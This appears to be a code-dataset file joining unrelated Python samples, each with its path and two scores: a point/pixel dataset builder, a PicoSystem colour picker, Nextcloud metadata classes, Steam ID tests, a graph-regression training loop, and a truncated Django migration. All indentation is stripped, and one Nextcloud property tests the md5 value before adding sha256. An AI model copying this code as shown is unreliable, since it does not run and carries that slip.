from utils import read_points
from utils import list_files, read_gray
#53941
#12270
#dataset/point/full/coords_rat-09-full.pts
#dataset/point/skel/coords_pocket-2-skel.pts
PT_PATH = "dataset/pixel/test"
PX_PATH = "dataset/pixel/train"
SK_PATH = "dataset/pixel/skel"
def get_in_pix(filename="in_pix.npy", ispix=True, isskel=False, istest=False):
path = PX_PATH
if istest:
path = PT_PATH
if isskel:
path = SK_PATH
if not ispix:
path = path.replace("pixel", "point")
files = list_files(path)
pix = []
pmax = 0
pmin = 255
maxpts = 0
for f in files:
pix_file = os.path.join(path, f)
print(pix_file)
if ispix:
pix_data = read_gray(pix_file)
else:
image = np.zeros((256,256), dtype=np.uint8)
pix_data = read_points(pix_file)
if len(pix_data) > maxpts:
maxpts = len(pix_data)
for p in pix_data:
if p[0]>pmax:
pmax = p[0]
if p[0]<pmin:
pmin = p[0]
if p[1]>pmax:
pmax = p[1]
if p[1]<pmin:
pmin = p[1]
x = min(round(p[0]), 255)
y = min(round(p[1]), 255)
image[x][y] = 255
impath = os.path.join("tmp", f + ".png")
print("Saving ... ", impath)
imsave(impath, image, cmap='gray')
pix_data = image
pix.append(pix_data)
# Max pts: 12270
print("Max pts: ", maxpts)
pix = np.array(pix)
print("Shape: ", pix.shape)
print("PMin: ", pmin)
print("PMax: ", pmax)
if not istest:
pix = np.expand_dims(pix, axis=3)
print("Final shape: ", pix.shape)
print("Min: ", np.amin(pix))
print("Max: ", np.amax(pix))
if not istest:
print("Saving to ", filename)
np.save(filename, pix)
return pix
def get_out_pix(filename="out_pix.npy"):
files = list_files(SK_PATH)
pix = []
for f in files:
pix_file = os.path.join(SK_PATH, f)
pix_data = read_gray(pix_file)
print(pix_file)
pix.append(pix_data)
pix = np.array(pix)
pix = np.mean(pix, axis=3)
pix = pix.astype(np.uint8)
print("Shape: ", pix.shape)
print("Uniques: ", np.unique(pix))
pix = np.expand_dims(pix, axis=3)
print("Final shape: ", pix.shape)
print("Min: ", np.amin(pix))
print("Max: ", np.amax(pix))
print("Saving to ", filename)
np.save(filename, pix)
return pix
if __name__ == '__main__':
parser = argparse.ArgumentParser()
help_ = "Generate train input dataset npy file"
parser.add_argument("--input",
default=False,
action='store_true',
help=help_)
help_ = "Generate train output dataset npy file"
parser.add_argument("--output",
default=False,
action='store_true',
help=help_)
args = parser.parse_args()
if not os.path.isdir('npy'):
os.makedirs('npy')
if not os.path.isdir('tmp'):
os.makedirs('tmp')
if args.output:
filename = os.path.join("npy", "out_pts.npy")
get_in_pix(filename=filename, ispix=False, isskel=True, istest=False)
if args.input:
filename = os.path.join("npy", "in_pts.npy")
get_in_pix(filename=filename, ispix=False, isskel=False, istest=False) | data.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import argparse
import os
from skimage.io import imsave
from utils import read_points
from utils import list_files, read_gray
#53941
#12270
#dataset/point/full/coords_rat-09-full.pts
#dataset/point/skel/coords_pocket-2-skel.pts
PT_PATH = "dataset/pixel/test"
PX_PATH = "dataset/pixel/train"
SK_PATH = "dataset/pixel/skel"
def get_in_pix(filename="in_pix.npy", ispix=True, isskel=False, istest=False):
path = PX_PATH
if istest:
path = PT_PATH
if isskel:
path = SK_PATH
if not ispix:
path = path.replace("pixel", "point")
files = list_files(path)
pix = []
pmax = 0
pmin = 255
maxpts = 0
for f in files:
pix_file = os.path.join(path, f)
print(pix_file)
if ispix:
pix_data = read_gray(pix_file)
else:
image = np.zeros((256,256), dtype=np.uint8)
pix_data = read_points(pix_file)
if len(pix_data) > maxpts:
maxpts = len(pix_data)
for p in pix_data:
if p[0]>pmax:
pmax = p[0]
if p[0]<pmin:
pmin = p[0]
if p[1]>pmax:
pmax = p[1]
if p[1]<pmin:
pmin = p[1]
x = min(round(p[0]), 255)
y = min(round(p[1]), 255)
image[x][y] = 255
impath = os.path.join("tmp", f + ".png")
print("Saving ... ", impath)
imsave(impath, image, cmap='gray')
pix_data = image
pix.append(pix_data)
# Max pts: 12270
print("Max pts: ", maxpts)
pix = np.array(pix)
print("Shape: ", pix.shape)
print("PMin: ", pmin)
print("PMax: ", pmax)
if not istest:
pix = np.expand_dims(pix, axis=3)
print("Final shape: ", pix.shape)
print("Min: ", np.amin(pix))
print("Max: ", np.amax(pix))
if not istest:
print("Saving to ", filename)
np.save(filename, pix)
return pix
def get_out_pix(filename="out_pix.npy"):
files = list_files(SK_PATH)
pix = []
for f in files:
pix_file = os.path.join(SK_PATH, f)
pix_data = read_gray(pix_file)
print(pix_file)
pix.append(pix_data)
pix = np.array(pix)
pix = np.mean(pix, axis=3)
pix = pix.astype(np.uint8)
print("Shape: ", pix.shape)
print("Uniques: ", np.unique(pix))
pix = np.expand_dims(pix, axis=3)
print("Final shape: ", pix.shape)
print("Min: ", np.amin(pix))
print("Max: ", np.amax(pix))
print("Saving to ", filename)
np.save(filename, pix)
return pix
if __name__ == '__main__':
parser = argparse.ArgumentParser()
help_ = "Generate train input dataset npy file"
parser.add_argument("--input",
default=False,
action='store_true',
help=help_)
help_ = "Generate train output dataset npy file"
parser.add_argument("--output",
default=False,
action='store_true',
help=help_)
args = parser.parse_args()
if not os.path.isdir('npy'):
os.makedirs('npy')
if not os.path.isdir('tmp'):
os.makedirs('tmp')
if args.output:
filename = os.path.join("npy", "out_pts.npy")
get_in_pix(filename=filename, ispix=False, isskel=True, istest=False)
if args.input:
filename = os.path.join("npy", "in_pts.npy")
get_in_pix(filename=filename, ispix=False, isskel=False, istest=False) | 0.39257 | 0.154535 |
import math
import time
blip = Voice(10, 0, 80, 0, 0, 0, 0, 100)
picker = Buffer(68, 68)
sliders = [
["R", 15, rgb(15, 0, 0)],
["G", 6, rgb(0, 15, 0)],
["B", 9, rgb(0, 0, 15)]
]
# selected colour coordinates
sx = 32
sy = 32
def colour_from_xy(x, y):
# convert an x, y coordinate (0..63, 0..63) into an r, g, b triplet
r = (x // 16) + (y // 16) * 4
g = y % 16
b = x % 16
return int(r), int(g), int(b)
def update(tick):
global sx, sy
if tick % 5 == 0:
# every 5th tick (every 50ms) check for user input and move/clamp the
# cursor position accordingly
if button(UP):
sy -= 1
sy = max(0, sy)
blip.play(1800, 10, 100)
if button(DOWN):
sy += 1
sy = min(63, sy)
blip.play(1800, 10, 100)
if button(LEFT):
sx -= 1
sx = max(0, sx)
blip.play(1800, 10, 100)
if button(RIGHT):
sx += 1
sx = min(63, sx)
blip.play(1800, 10, 100)
# update our selected colour from the new cursor position
sliders[0][1], sliders[1][1], sliders[2][1] = colour_from_xy(sx, sy)
def draw_rgb_palette(x, y):
blit(picker, 0, 0, 68, 68, x, y)
# calculate a brightness for the cursor that pulses over time
cursor_pulse = int((math.sin(time.ticks_ms() / 100.0) + 1.0) * 7.5)
pen(cursor_pulse, cursor_pulse, cursor_pulse)
# draw cursor
hline(sx - 5 + x + 2, sy + y + 2, 3)
hline(sx + 2 + x + 2, sy + y + 2, 3)
vline(sx + x + 2, sy - 5 + y + 2, 3)
vline(sx + x + 2, sy + 2 + y + 2, 3)
def prepare_rgb_palette():
target(picker)
blend(COPY)
# clear to black
pen(0, 0, 0)
clear()
# draw outline
pen(8, 8, 8)
rect(0, 0, 68, 68)
# draw the full palette grid of 64 x 64 pixels, this covers every single
# colour in the picosystem 4096 colour (4 bits per channel) palette.
for py in range(64):
for px in range(64):
r, g, b = colour_from_xy(px, py)
pen(r, g, b)
pixel(px + 2, py + 2)
target()
blend(ALPHA)
def draw_slider(slider, x, y):
w = 10
h = 68
# draw outline rectangle
pen(slider[2])
rect(x, y, w, h)
# draw proportional filled value rectangle
sh = int(((h - 4) * slider[1]) / 15)
frect(x + 2, y + h - sh - 2, w - 4, sh)
def draw(tick):
# clear the screen
pen(1, 1, 1)
clear()
# draw title
pen(15, 15, 15)
frect(0, 0, 120, 11)
pen(1, 1, 1)
text("Palette Explorer", 2, 2)
# draw full palette
draw_rgb_palette(5, 18)
# draw r, g, b value sliders
draw_slider(sliders[0], 80, 18)
draw_slider(sliders[1], 92, 18)
draw_slider(sliders[2], 104, 18)
# draw selected colour swatch
pen(8, 8, 8)
rect(80, 92, 34, 23)
col = rgb(sliders[0][1], sliders[1][1], sliders[2][1])
pen(col)
frect(82, 94, 30, 19)
# draw pen() call and constant value
pen(13, 13, 13)
pen_call = f"pen({sliders[0][1]}, {sliders[1][1]}, {sliders[2][1]})"
text(pen_call, 5, 92)
text(f"col = 0x{col:04x}", 5, 107)
prepare_rgb_palette()
start() | micropython/examples/picosystem/colour.py | import math
import time
blip = Voice(10, 0, 80, 0, 0, 0, 0, 100)
picker = Buffer(68, 68)
sliders = [
["R", 15, rgb(15, 0, 0)],
["G", 6, rgb(0, 15, 0)],
["B", 9, rgb(0, 0, 15)]
]
# selected colour coordinates
sx = 32
sy = 32
def colour_from_xy(x, y):
# convert an x, y coordinate (0..63, 0..63) into an r, g, b triplet
r = (x // 16) + (y // 16) * 4
g = y % 16
b = x % 16
return int(r), int(g), int(b)
def update(tick):
global sx, sy
if tick % 5 == 0:
# every 5th tick (every 50ms) check for user input and move/clamp the
# cursor position accordingly
if button(UP):
sy -= 1
sy = max(0, sy)
blip.play(1800, 10, 100)
if button(DOWN):
sy += 1
sy = min(63, sy)
blip.play(1800, 10, 100)
if button(LEFT):
sx -= 1
sx = max(0, sx)
blip.play(1800, 10, 100)
if button(RIGHT):
sx += 1
sx = min(63, sx)
blip.play(1800, 10, 100)
# update our selected colour from the new cursor position
sliders[0][1], sliders[1][1], sliders[2][1] = colour_from_xy(sx, sy)
def draw_rgb_palette(x, y):
blit(picker, 0, 0, 68, 68, x, y)
# calculate a brightness for the cursor that pulses over time
cursor_pulse = int((math.sin(time.ticks_ms() / 100.0) + 1.0) * 7.5)
pen(cursor_pulse, cursor_pulse, cursor_pulse)
# draw cursor
hline(sx - 5 + x + 2, sy + y + 2, 3)
hline(sx + 2 + x + 2, sy + y + 2, 3)
vline(sx + x + 2, sy - 5 + y + 2, 3)
vline(sx + x + 2, sy + 2 + y + 2, 3)
def prepare_rgb_palette():
target(picker)
blend(COPY)
# clear to black
pen(0, 0, 0)
clear()
# draw outline
pen(8, 8, 8)
rect(0, 0, 68, 68)
# draw the full palette grid of 64 x 64 pixels, this covers every single
# colour in the picosystem 4096 colour (4 bits per channel) palette.
for py in range(64):
for px in range(64):
r, g, b = colour_from_xy(px, py)
pen(r, g, b)
pixel(px + 2, py + 2)
target()
blend(ALPHA)
def draw_slider(slider, x, y):
w = 10
h = 68
# draw outline rectangle
pen(slider[2])
rect(x, y, w, h)
# draw proportional filled value rectangle
sh = int(((h - 4) * slider[1]) / 15)
frect(x + 2, y + h - sh - 2, w - 4, sh)
def draw(tick):
# clear the screen
pen(1, 1, 1)
clear()
# draw title
pen(15, 15, 15)
frect(0, 0, 120, 11)
pen(1, 1, 1)
text("Palette Explorer", 2, 2)
# draw full palette
draw_rgb_palette(5, 18)
# draw r, g, b value sliders
draw_slider(sliders[0], 80, 18)
draw_slider(sliders[1], 92, 18)
draw_slider(sliders[2], 104, 18)
# draw selected colour swatch
pen(8, 8, 8)
rect(80, 92, 34, 23)
col = rgb(sliders[0][1], sliders[1][1], sliders[2][1])
pen(col)
frect(82, 94, 30, 19)
# draw pen() call and constant value
pen(13, 13, 13)
pen_call = f"pen({sliders[0][1]}, {sliders[1][1]}, {sliders[2][1]})"
text(pen_call, 5, 92)
text(f"col = 0x{col:04x}", 5, 107)
prepare_rgb_palette()
start() | 0.477311 | 0.479686 |
from waterbutler.core import metadata
class BaseNextcloudMetadata(metadata.BaseMetadata):
def __init__(self, href, folder, provider, attributes=None):
super(BaseNextcloudMetadata, self).__init__(None)
self.attributes = attributes or {}
self._folder = folder
self._href = href
self._provider = provider
@property
def provider(self):
return self._provider
@property
def name(self):
return self._href.strip('/').split('/')[-1]
@property
def path(self):
path = self._href[len(self._folder) - 1:]
return path
@property
def size(self):
if '{DAV:}getcontentlength' in self.attributes:
return str(int(self.attributes['{DAV:}getcontentlength']))
return None
@property
def etag(self):
if '{DAV:}getetag' in self.attributes:
return str(self.attributes['{DAV:}getetag'])
return None
@property
def etag_noquote(self):
if self.etag:
return self.etag.strip('"')
return None
@property
def modified(self):
if '{DAV:}getlastmodified' in self.attributes:
return self.attributes['{DAV:}getlastmodified']
return None
@property
def created_utc(self):
return None
class NextcloudFileMetadata(BaseNextcloudMetadata, metadata.BaseFileMetadata):
def __init__(self, href, folder, provider, attributes=None):
super().__init__(href, folder, provider, attributes=attributes)
self._extra = {}
@property
def content_type(self):
if '{DAV:}getcontenttype' in self.attributes:
return str(self.attributes['{DAV:}getcontenttype'])
return None
@property
def fileid(self):
if '{http://owncloud.org/ns}fileid' in self.attributes:
return str(self.attributes['{http://owncloud.org/ns}fileid'])
return None
@property
def extra(self):
return {
'hashes': {
self.provider: self._extra.get('hashes', {}),
},
}
@extra.setter
def extra(self, data):
self._extra = data
class NextcloudFolderMetadata(BaseNextcloudMetadata, metadata.BaseFolderMetadata):
@property
def content_type(self):
if '{DAV:}getcontenttype' in self.attributes:
return str(self.attributes['{DAV:}getcontenttype'])
return 'httpd/unix-directory'
class NextcloudFileRevisionMetadata(metadata.BaseFileRevisionMetadata):
def __init__(self, provider, version, metadata):
self._provider = provider
self._metadata = metadata
self._version = version
self._modified = self._metadata.modified
self._md5 = metadata.extra['hashes'][self.provider].get('md5')
self._sha256 = metadata.extra['hashes'][self.provider].get('sha256')
@classmethod
def from_metadata(cls, provider, revision, metadata):
return NextcloudFileRevisionMetadata(provider, revision, metadata)
@property
def provider(self):
return self._provider
@property
def version_identifier(self):
return 'revision'
@property
def version(self):
return self._version
@property
def modified(self):
return self._modified
@property
def extra(self):
hashes = {}
if self._md5:
hashes['md5'] = self._md5
if self._md5:
hashes['sha256'] = self._sha256
return {'hashes': hashes} | waterbutler/providers/nextcloud/metadata.py | from waterbutler.core import metadata
class BaseNextcloudMetadata(metadata.BaseMetadata):
def __init__(self, href, folder, provider, attributes=None):
super(BaseNextcloudMetadata, self).__init__(None)
self.attributes = attributes or {}
self._folder = folder
self._href = href
self._provider = provider
@property
def provider(self):
return self._provider
@property
def name(self):
return self._href.strip('/').split('/')[-1]
@property
def path(self):
path = self._href[len(self._folder) - 1:]
return path
@property
def size(self):
if '{DAV:}getcontentlength' in self.attributes:
return str(int(self.attributes['{DAV:}getcontentlength']))
return None
@property
def etag(self):
if '{DAV:}getetag' in self.attributes:
return str(self.attributes['{DAV:}getetag'])
return None
@property
def etag_noquote(self):
if self.etag:
return self.etag.strip('"')
return None
@property
def modified(self):
if '{DAV:}getlastmodified' in self.attributes:
return self.attributes['{DAV:}getlastmodified']
return None
@property
def created_utc(self):
return None
class NextcloudFileMetadata(BaseNextcloudMetadata, metadata.BaseFileMetadata):
def __init__(self, href, folder, provider, attributes=None):
super().__init__(href, folder, provider, attributes=attributes)
self._extra = {}
@property
def content_type(self):
if '{DAV:}getcontenttype' in self.attributes:
return str(self.attributes['{DAV:}getcontenttype'])
return None
@property
def fileid(self):
if '{http://owncloud.org/ns}fileid' in self.attributes:
return str(self.attributes['{http://owncloud.org/ns}fileid'])
return None
@property
def extra(self):
return {
'hashes': {
self.provider: self._extra.get('hashes', {}),
},
}
@extra.setter
def extra(self, data):
self._extra = data
class NextcloudFolderMetadata(BaseNextcloudMetadata, metadata.BaseFolderMetadata):
@property
def content_type(self):
if '{DAV:}getcontenttype' in self.attributes:
return str(self.attributes['{DAV:}getcontenttype'])
return 'httpd/unix-directory'
class NextcloudFileRevisionMetadata(metadata.BaseFileRevisionMetadata):
def __init__(self, provider, version, metadata):
self._provider = provider
self._metadata = metadata
self._version = version
self._modified = self._metadata.modified
self._md5 = metadata.extra['hashes'][self.provider].get('md5')
self._sha256 = metadata.extra['hashes'][self.provider].get('sha256')
@classmethod
def from_metadata(cls, provider, revision, metadata):
return NextcloudFileRevisionMetadata(provider, revision, metadata)
@property
def provider(self):
return self._provider
@property
def version_identifier(self):
return 'revision'
@property
def version(self):
return self._version
@property
def modified(self):
return self._modified
@property
def extra(self):
hashes = {}
if self._md5:
hashes['md5'] = self._md5
if self._md5:
hashes['sha256'] = self._sha256
return {'hashes': hashes} | 0.776284 | 0.099339 |
from app.steam.id import (is_valid_steamid,
is_steamid,
is_steamid64,
is_steamid3,
steamid_to_steamid64,
steamid64_to_steamid,
steamid64_to_steamid3,
steamid3_to_steamid,
SteamID)
steamids_a = ['76561197960359452', 'STEAM_0:0:46862', '[U:1:93724]']
steamids_b = ['76561198066693739', 'STEAM_0:1:53214005', '[U:1:106428011]']
def test_valid_steamid():
for steamid in steamids_a + steamids_b:
assert is_valid_steamid(steamid)
def test_is_steamid():
assert is_steamid(steamids_a[1])
assert is_steamid(steamids_b[1])
def test_is_steamid64():
assert is_steamid64(steamids_a[0])
assert is_steamid64(steamids_b[0])
def test_is_steamid3():
assert is_steamid3(steamids_a[2])
assert is_steamid3(steamids_b[2])
def test_convert_steamid_to_steamid64():
steamid_a, steamid_b = steamids_a[1], steamids_b[1]
assert steamid_to_steamid64(steamid_a) == steamids_a[0]
assert steamid_to_steamid64(steamid_b) == steamids_b[0]
def test_convert_steamid64_to_steamid():
steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
assert steamid64_to_steamid(steamid64_a) == steamids_a[1]
assert steamid64_to_steamid(steamid64_b) == steamids_b[1]
def test_convert_steamid64_to_steamid3():
steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
assert steamid64_to_steamid3(steamid64_a) == steamids_a[2]
assert steamid64_to_steamid3(steamid64_b) == steamids_b[2]
def test_convert_steamid3_to_steamid():
steamid3_a, steamid3_b = steamids_a[2], steamids_b[2]
assert steamid3_to_steamid(steamid3_a) == steamids_a[1]
assert steamid3_to_steamid(steamid3_b) == steamids_b[1]
def test_steamid_from_steamid():
steamid_a, steamid_b = steamids_a[1], steamids_b[1]
a = SteamID(steamid_a)
b = SteamID(steamid_b)
assert a.steamid == steamids_a[1]
assert a.steamid64 == steamids_a[0]
assert a.steamid3 == steamids_a[2]
assert b.steamid == steamids_b[1]
assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid64():
steamid_a, steamid_b = steamids_a[0], steamids_b[0]
a = SteamID(steamid_a)
b = SteamID(steamid_b)
assert a.steamid == steamids_a[1]
assert a.steamid64 == steamids_a[0]
assert a.steamid3 == steamids_a[2]
assert b.steamid == steamids_b[1]
assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid3():
steamid_a, steamid_b = steamids_a[2], steamids_b[2]
a = SteamID(steamid_a)
b = SteamID(steamid_b)
assert a.steamid == steamids_a[1]
assert a.steamid64 == steamids_a[0]
assert a.steamid3 == steamids_a[2]
assert b.steamid == steamids_b[1]
assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2] | tests/test_steam_ids.py | from app.steam.id import (is_valid_steamid,
is_steamid,
is_steamid64,
is_steamid3,
steamid_to_steamid64,
steamid64_to_steamid,
steamid64_to_steamid3,
steamid3_to_steamid,
SteamID)
steamids_a = ['76561197960359452', 'STEAM_0:0:46862', '[U:1:93724]']
steamids_b = ['76561198066693739', 'STEAM_0:1:53214005', '[U:1:106428011]']
def test_valid_steamid():
for steamid in steamids_a + steamids_b:
assert is_valid_steamid(steamid)
def test_is_steamid():
assert is_steamid(steamids_a[1])
assert is_steamid(steamids_b[1])
def test_is_steamid64():
assert is_steamid64(steamids_a[0])
assert is_steamid64(steamids_b[0])
def test_is_steamid3():
assert is_steamid3(steamids_a[2])
assert is_steamid3(steamids_b[2])
def test_convert_steamid_to_steamid64():
steamid_a, steamid_b = steamids_a[1], steamids_b[1]
assert steamid_to_steamid64(steamid_a) == steamids_a[0]
assert steamid_to_steamid64(steamid_b) == steamids_b[0]
def test_convert_steamid64_to_steamid():
steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
assert steamid64_to_steamid(steamid64_a) == steamids_a[1]
assert steamid64_to_steamid(steamid64_b) == steamids_b[1]
def test_convert_steamid64_to_steamid3():
steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
assert steamid64_to_steamid3(steamid64_a) == steamids_a[2]
assert steamid64_to_steamid3(steamid64_b) == steamids_b[2]
def test_convert_steamid3_to_steamid():
steamid3_a, steamid3_b = steamids_a[2], steamids_b[2]
assert steamid3_to_steamid(steamid3_a) == steamids_a[1]
assert steamid3_to_steamid(steamid3_b) == steamids_b[1]
def test_steamid_from_steamid():
steamid_a, steamid_b = steamids_a[1], steamids_b[1]
a = SteamID(steamid_a)
b = SteamID(steamid_b)
assert a.steamid == steamids_a[1]
assert a.steamid64 == steamids_a[0]
assert a.steamid3 == steamids_a[2]
assert b.steamid == steamids_b[1]
assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid64():
steamid_a, steamid_b = steamids_a[0], steamids_b[0]
a = SteamID(steamid_a)
b = SteamID(steamid_b)
assert a.steamid == steamids_a[1]
assert a.steamid64 == steamids_a[0]
assert a.steamid3 == steamids_a[2]
assert b.steamid == steamids_b[1]
assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid3():
steamid_a, steamid_b = steamids_a[2], steamids_b[2]
a = SteamID(steamid_a)
b = SteamID(steamid_b)
assert a.steamid == steamids_a[1]
assert a.steamid64 == steamids_a[0]
assert a.steamid3 == steamids_a[2]
assert b.steamid == steamids_b[1]
assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2] | 0.460289 | 0.610599 |
import torch
import torch.nn as nn
import math
from .metrics import MSE, MAE, MAPE
from graph_edit_distance import embedding_distances
def train_epoch(model, optimizer, device, data_loader, epoch):
model.train()
epoch_loss = 0
epoch_train_mse = 0
epoch_train_mae = 0
epoch_train_mape = 0
nb_data = 0
gpu_mem = 0
for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
batch_x = batch_graphs.ndata['feat'].to(device) # num x feat
batch_e = batch_graphs.edata['feat'].to(device)
batch_snorm_e = batch_snorm_e.to(device)
batch_targets = batch_targets.to(device)
batch_snorm_n = batch_snorm_n.to(device) # num x 1
optimizer.zero_grad()
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
loss = model.loss(batch_scores, batch_targets)
loss.backward()
optimizer.step()
epoch_loss += loss.detach().item()
mse = MSE(batch_scores, batch_targets, model.distance_function)
mae = MAE(batch_scores, batch_targets, model.distance_function)
mape = MAPE(batch_scores, batch_targets, model.distance_function)
epoch_train_mse += mse
epoch_train_mae += mae
epoch_train_mape += mape
#print("\ntrain ", batch_scores, batch_targets, mae)
nb_data += batch_targets.size(0)
epoch_loss /= (iter + 1)
epoch_train_mse /= (iter + 1)
epoch_train_mae /= (iter + 1)
epoch_train_mape /= (iter + 1)
return epoch_loss, [epoch_train_mse, epoch_train_mae, epoch_train_mape], optimizer
def evaluate_network(model, device, data_loader, epoch):
model.eval()
epoch_test_loss = 0
epoch_test_mse = 0
epoch_test_mae = 0
epoch_test_mape = 0
nb_data = 0
with torch.no_grad():
for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
batch_x = batch_graphs.ndata['feat'].to(device)
batch_e = batch_graphs.edata['feat'].to(device)
batch_snorm_e = batch_snorm_e.to(device)
batch_targets = batch_targets.to(device)
batch_snorm_n = batch_snorm_n.to(device)
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
loss = model.loss(batch_scores, batch_targets)
epoch_test_loss += loss.detach().item()
mse = MSE(batch_scores, batch_targets, model.distance_function)
mae = MAE(batch_scores, batch_targets, model.distance_function)
mape = MAPE(batch_scores, batch_targets, model.distance_function)
epoch_test_mse += mse
epoch_test_mae += mae
epoch_test_mape += mape
#print("\nval ", batch_scores, batch_targets, mae)
nb_data += batch_targets.size(0)
epoch_test_loss /= (iter + 1)
epoch_test_mse /= (iter + 1)
epoch_test_mae /= (iter + 1)
epoch_test_mape /= (iter + 1)
return epoch_test_loss, [epoch_test_mse, epoch_test_mae, epoch_test_mape]
def get_predictions(model, device, data_loader, epoch):
model.eval()
targets = []
scores = []
with torch.no_grad():
for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
batch_x = batch_graphs.ndata['feat'].to(device)
batch_e = batch_graphs.edata['feat'].to(device)
batch_snorm_e = batch_snorm_e.to(device)
batch_targets = batch_targets.to(device)
batch_snorm_n = batch_snorm_n.to(device)
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
targets += batch_targets.flatten().tolist()
scores += embedding_distances(batch_scores, model.distance_function).flatten().tolist()
return targets, scores | realworld_benchmark/train/train_molecules_graph_regression.py | import torch
import torch.nn as nn
import math
from .metrics import MSE, MAE, MAPE
from graph_edit_distance import embedding_distances
def train_epoch(model, optimizer, device, data_loader, epoch):
model.train()
epoch_loss = 0
epoch_train_mse = 0
epoch_train_mae = 0
epoch_train_mape = 0
nb_data = 0
gpu_mem = 0
for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
batch_x = batch_graphs.ndata['feat'].to(device) # num x feat
batch_e = batch_graphs.edata['feat'].to(device)
batch_snorm_e = batch_snorm_e.to(device)
batch_targets = batch_targets.to(device)
batch_snorm_n = batch_snorm_n.to(device) # num x 1
optimizer.zero_grad()
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
loss = model.loss(batch_scores, batch_targets)
loss.backward()
optimizer.step()
epoch_loss += loss.detach().item()
mse = MSE(batch_scores, batch_targets, model.distance_function)
mae = MAE(batch_scores, batch_targets, model.distance_function)
mape = MAPE(batch_scores, batch_targets, model.distance_function)
epoch_train_mse += mse
epoch_train_mae += mae
epoch_train_mape += mape
#print("\ntrain ", batch_scores, batch_targets, mae)
nb_data += batch_targets.size(0)
epoch_loss /= (iter + 1)
epoch_train_mse /= (iter + 1)
epoch_train_mae /= (iter + 1)
epoch_train_mape /= (iter + 1)
return epoch_loss, [epoch_train_mse, epoch_train_mae, epoch_train_mape], optimizer
def evaluate_network(model, device, data_loader, epoch):
model.eval()
epoch_test_loss = 0
epoch_test_mse = 0
epoch_test_mae = 0
epoch_test_mape = 0
nb_data = 0
with torch.no_grad():
for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
batch_x = batch_graphs.ndata['feat'].to(device)
batch_e = batch_graphs.edata['feat'].to(device)
batch_snorm_e = batch_snorm_e.to(device)
batch_targets = batch_targets.to(device)
batch_snorm_n = batch_snorm_n.to(device)
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
loss = model.loss(batch_scores, batch_targets)
epoch_test_loss += loss.detach().item()
mse = MSE(batch_scores, batch_targets, model.distance_function)
mae = MAE(batch_scores, batch_targets, model.distance_function)
mape = MAPE(batch_scores, batch_targets, model.distance_function)
epoch_test_mse += mse
epoch_test_mae += mae
epoch_test_mape += mape
#print("\nval ", batch_scores, batch_targets, mae)
nb_data += batch_targets.size(0)
epoch_test_loss /= (iter + 1)
epoch_test_mse /= (iter + 1)
epoch_test_mae /= (iter + 1)
epoch_test_mape /= (iter + 1)
return epoch_test_loss, [epoch_test_mse, epoch_test_mae, epoch_test_mape]
def get_predictions(model, device, data_loader, epoch):
model.eval()
targets = []
scores = []
with torch.no_grad():
for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
batch_x = batch_graphs.ndata['feat'].to(device)
batch_e = batch_graphs.edata['feat'].to(device)
batch_snorm_e = batch_snorm_e.to(device)
batch_targets = batch_targets.to(device)
batch_snorm_n = batch_snorm_n.to(device)
batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
targets += batch_targets.flatten().tolist()
scores += embedding_distances(batch_scores, model.distance_function).flatten().tolist()
return targets, scores | 0.631594 | 0.510313 |
from itertools import count
from django.db import migrations, models
import django.db.models.deletion
def create_school_year_divisions(apps, schema_editor):
Course = apps.get_model('leprikon', 'Course')
CourseDiscount = apps.get_model('leprikon', 'CourseDiscount')
SchoolYearDivision = apps.get_model('leprikon', 'SchoolYearDivision')
SchoolYearPeriod = apps.get_model('leprikon', 'SchoolYearPeriod')
new_period_ids = {}
new_period_ids_fuzzy = {}
school_year_division_ids = {}
for course in Course.objects.order_by('id').iterator():
key = tuple(course.periods.order_by('id').values_list('id', flat=True))
if key not in school_year_division_ids:
name = course.unit
counter = count(2)
while SchoolYearDivision.objects.filter(
school_year_id=course.school_year_id,
name=name,
).exists():
name='{course_unit} {c}'.format(course_unit=course.unit, c=next(counter))
school_year_division = SchoolYearDivision.objects.create(
school_year_id=course.school_year_id,
name=name,
period_name=course.unit,
)
for period in course.periods.all():
old_period_id = period.id
period.id, period.pk = None, None
period.school_year_division = school_year_division
period.save()
new_period_ids[(key, old_period_id)] = period.id
new_period_ids_fuzzy[(key, period.name)] = period.id
school_year_division_ids[key] = school_year_division.id
course.school_year_division_id = school_year_division_ids[key]
course.save()
# fix discounts
for discount in CourseDiscount.objects.filter(
registration__subject_id=course.id
).select_related('period', 'registration'):
old_period = discount.period
discount.period = None
discount.period_id = new_period_ids.get((key, old_period.id))
if discount.period_id is None:
discount.period_id = new_period_ids_fuzzy.get((key, old_period.name))
discount.save()
# delete original periods
SchoolYearPeriod.objects.filter(school_year_division=None).delete()
class Migration(migrations.Migration):
dependencies = [
('leprikon', '0014_variable_symbol'),
]
operations = [
migrations.CreateModel(
name='SchoolYearDivision',
fields=[
